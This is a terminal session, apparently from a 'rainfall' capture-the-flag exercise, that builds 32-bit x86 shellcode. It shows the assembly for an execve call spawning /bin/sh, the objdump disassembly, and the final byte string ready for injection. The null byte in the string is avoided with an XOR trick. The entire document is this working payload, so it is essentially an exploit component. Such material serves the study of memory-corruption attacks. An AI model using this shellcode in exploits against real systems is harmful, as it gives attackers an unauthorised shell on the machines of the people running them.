root@debian:/home/user/rainfall# cat shell.asm 
global main
section .text
main:
	db 0x90,0x90,0x90,0x90
	xor edx, edx
	xor ecx, ecx
	xor eax, eax
	mov al, 0xb ;execve syscall and last byte of stack string
	push 0x0b68732f
	push 0x6e69622f
	xor byte [esp+7], al
	mov ebx, esp
	and esp, 0xfffffff0
	int 0x80
	db 0x90,0x90,0x90,0x90
root@debian:/home/user/rainfall# objdump -d -M intel shell | grep '<main>' -A24
00000560 <main>:
 560:	90                   	nop
 561:	90                   	nop
 562:	90                   	nop
 563:	90                   	nop
 564:	31 d2                	xor    edx,edx
 566:	31 c9                	xor    ecx,ecx
 568:	31 c0                	xor    eax,eax
 56a:	b0 0b                	mov    al,0xb
 56c:	68 2f 73 68 0b       	push   0xb68732f
 571:	68 2f 62 69 6e       	push   0x6e69622f
 576:	30 44 24 07          	xor    BYTE PTR [esp+0x7],al
 57a:	89 e3                	mov    ebx,esp
 57c:	83 e4 f0             	and    esp,0xfffffff0
 57f:	cd 80                	int    0x80
 581:	90                   	nop
 582:	90                   	nop
 583:	90                   	nop
 584:	90                   	nop


 31 d2 31 c9 31 c0 b0 0b 68 2f 73 68 0b 68 2f 62 69 6e 30 44 24 07 89 e3 83 e4 f0 cd 80          
\x31\xd2\x31\xc9\x31\xc0\xb0\x0b\x68\x2f\x73\x68\x0b\x68\x2f\x62\x69\x6e\x30\x44\x24\x07\x89\xe3\x83\xe4\xf0\xcd\x80
